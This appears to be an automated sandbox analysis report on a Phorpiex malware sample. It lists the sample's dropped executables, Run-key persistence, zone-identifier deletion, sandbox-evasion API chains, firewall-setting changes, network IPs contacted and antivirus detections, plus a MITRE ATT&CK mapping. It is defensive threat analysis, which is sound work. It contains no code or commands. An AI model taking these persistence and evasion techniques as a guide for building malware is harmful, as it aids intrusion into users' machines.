                          Source: C:\Windows\sysmablsvr.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\sysmablsvr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeCode function: 6_2_006E1DF1 push ecx; ret 6_2_006E1E04
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeCode function: 7_2_00221771 push ecx; ret 7_2_00221784
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeCode function: 9_2_00A31DF1 push ecx; ret 9_2_00A31E04
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeCode function: 10_2_003D1DF1 push ecx; ret 10_2_003D1E04

                          Persistence and Installation Behavior

                          barindex
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Users\user\Desktop\file.exeExecutable created and started: C:\Windows\sysmablsvr.exeJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile created: C:\Users\user\AppData\Local\Temp\158752420.exeJump to dropped file
                          Source: C:\Windows\sysmablsvr.exeFile created: C:\Users\user\AppData\Local\Temp\259428477.exeJump to dropped file
                          Source: C:\Windows\sysmablsvr.exeFile created: C:\Users\user\AppData\Local\Temp\2958729589.exeJump to dropped file
                          Source: C:\Windows\sysmablsvr.exeFile created: C:\Users\user\AppData\Local\Temp\524024912.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\sysmablsvr.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\sysmablsvr.exeJump to dropped file
                          Source: C:\Windows\sysmablsvr.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Changes the view of files in windows explorer (hidden files and folders)
                          Source: C:\Windows\sysmablsvr.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValueJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\file.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Windows\sysmablsvr.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\21548511.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\193855420.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\158752420.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\524024912.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\356818234.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\3079321897.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\259428477.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\239315810.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\3022733304.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysmablsvr.exeFile opened: C:\Users\user\AppData\Local\Temp\2958729589.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Contains functionality to detect sleep reduction / modifications
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D2800_2_0040D280
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040D2801_2_0040D280
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040D2802_2_0040D280
                          Found evasive API chain (may stop execution after checking mutex)
                          Source: C:\Windows\sysmablsvr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4382
                          Source: C:\Windows\sysmablsvr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4382
                          Source: C:\Windows\sysmablsvr.exeWindow / User API: threadDelayed 3256Jump to behavior
                          Source: C:\Windows\sysmablsvr.exeWindow / User API: threadDelayed 1651Jump to behavior
                          Source: C:\Windows\sysmablsvr.exeWindow / User API: threadDelayed 597Jump to behavior
                          Source: C:\Windows\sysmablsvr.exeWindow / User API: threadDelayed 1009Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-4401
                          Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-4382
                          Source: C:\Windows\sysmablsvr.exeEvaded block: after key decisiongraph_2-4380
                          Source: C:\Windows\sysmablsvr.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_2-5345
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-4435
                          Source: C:\Windows\sysmablsvr.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4404
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-5346
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-322
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\Desktop\file.exeAPI coverage: 3.6 %
                          Source: C:\Windows\sysmablsvr.exeAPI coverage: 0.9 %
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D2800_2_0040D280
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040D2802_2_0040D280
                          Source: C:\Windows\sysmablsvr.exe TID: 6772Thread sleep time: -60000s >= -30000sJump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 5232Thread sleep count: 3256 > 30Jump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 5232Thread sleep time: -6512000s >= -30000sJump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 6772Thread sleep count: 1651 > 30Jump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 3872Thread sleep count: 597 > 30Jump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 5764Thread sleep time: -123775s >= -30000sJump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 5232Thread sleep count: 1009 > 30Jump to behavior
                          Source: C:\Windows\sysmablsvr.exe TID: 5232Thread sleep time: -2018000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00406650
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406510
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00406650
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406510
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00406650
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406510
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
                          Source: C:\Windows\sysmablsvr.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\Windows\sysmablsvr.exeThread delayed: delay time: 123775Jump to behavior
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, 524024912.exe, 00000007.00000002.2490877099.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, 524024912.exe, 00000007.00000002.2490877099.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCP
                          Source: C:\Windows\sysmablsvr.exeAPI call chain: ExitProcess graph end nodegraph_1-4425
                          Source: C:\Windows\sysmablsvr.exeAPI call chain: ExitProcess graph end nodegraph_2-4423
                          Source: C:\Windows\sysmablsvr.exeAPI call chain: ExitProcess graph end nodegraph_2-4391
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeCode function: 7_2_002218A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_002218A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A470 GetProcessHeaps,0_2_0040A470
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeCode function: 6_2_006E1B24 SetUnhandledExceptionFilter,6_2_006E1B24
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeCode function: 7_2_002218A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_002218A8
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exeCode function: 9_2_00A31B24 SetUnhandledExceptionFilter,9_2_00A31B24
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exeCode function: 10_2_003D1B24 SetUnhandledExceptionFilter,10_2_003D1B24
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,strcmp,0_2_0040ECC0
                          Source: C:\Windows\sysmablsvr.exeCode function: GetLocaleInfoA,strcmp,1_2_0040ECC0
                          Source: C:\Windows\sysmablsvr.exeCode function: GetLocaleInfoA,strcmp,2_2_0040ECC0
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeCode function: 6_2_006E1E58 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_006E1E58
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exeCode function: 6_2_006E14E0 memset,GetModuleHandleW,GetProcAddress,memset,GetVersionExA,memset,GetVersionExA,6_2_006E14E0

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Changes security center settings (notifications, updates, antivirus, firewall)
                          Source: C:\Windows\sysmablsvr.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior

                          Remote Access Functionality

                          barindex
                          Yara detected Phorpiex
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysmablsvr.exe PID: 6768, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysmablsvr.exe PID: 2148, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\sysmablsvr.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,0_2_00401470
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DCA0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,0_2_0040DCA0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013B0 CreateEventA,socket,bind,CreateThread,0_2_004013B0
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_00401470
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_0040DCA0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040DCA0
                          Source: C:\Windows\sysmablsvr.exeCode function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread,1_2_004013B0
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_0040DCA0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040DCA0
                          Source: C:\Windows\sysmablsvr.exeCode function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Native API                          		1
                          Windows Service                          		1
                          Windows Service                          		121
                          Masquerading                          		11
                          Input Capture                          		1
                          System Time Discovery                          		Remote Services11
                          Input Capture                          		2
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder                          		1
                          Process Injection                          		1
                          Disable or Modify Tools                          		LSASS Memory231
                          Security Software Discovery                          		Remote Desktop Protocol1
                          Archive Collected Data                          		1
                          Non-Standard Port                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          Registry Run Keys / Startup Folder                          		11
                          Virtualization/Sandbox Evasion                          		Security Account Manager11
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin Shares3
                          Clipboard Data                          		4
                          Ingress Tool Transfer                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          DLL Side-Loading                          		1
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                          Hidden Files and Directories                          		LSA Secrets1
                          System Network Connections Discovery                          		SSHKeylogging12
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Obfuscated Files or Information                          		Cached Domain Credentials1
                          File and Directory Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          DLL Side-Loading                          		DCSync15
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1512821 Sample: file.exe Startdate: 17/09/2024 Architecture: WINDOWS Score: 100 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 5 other signatures 2->49 7 file.exe 1 1 2->7         started        11 sysmablsvr.exe 2->11         started        process3 file4 27 C:\Windows\sysmablsvr.exe, PE32 7->27 dropped 55 Contains functionality to check if Internet connection is working 7->55 57 Drops executables to the windows directory (C:\Windows) and starts them 7->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->59 61 Contains functionality to detect sleep reduction / modifications 7->61 13 sysmablsvr.exe 8 44 7->13         started        signatures5 process6 dnsIp7 37 185.215.113.66, 49730, 49732, 49734 WHOLESALECONNECTIONSNL Portugal 13->37 39 100.109.48.43, 40500 UUNETUS Reserved 13->39 41 85 other IPs or domains 13->41 29 C:\Users\user\AppData\Local\...\524024912.exe, PE32 13->29 dropped 31 C:\Users\user\AppData\...\2958729589.exe, PE32 13->31 dropped 33 C:\Users\user\AppData\Local\...\259428477.exe, PE32 13->33 dropped 35 7 other malicious files 13->35 dropped 63 Antivirus detection for dropped file 13->63 65 Multi AV Scanner detection for dropped file 13->65 67 Found evasive API chain (may stop execution after checking mutex) 13->67 69 6 other signatures 13->69 18 524024912.exe 13 13->18         started        21 158752420.exe 1 13->21         started        23 259428477.exe 13->23         started        25 2958729589.exe 13->25         started        file8 signatures9 process10 signatures11 51 Antivirus detection for dropped file 18->51 53 Multi AV Scanner detection for dropped file 18->53

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe84%ReversingLabsWin32.Trojan.MintZard
                          file.exe100%AviraHEUR/AGEN.1315882
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\524024912.exe100%AviraTR/Dldr.Agent.gqemd
                          C:\Windows\sysmablsvr.exe100%AviraHEUR/AGEN.1315882
                          C:\Windows\sysmablsvr.exe100%Joe Sandbox ML
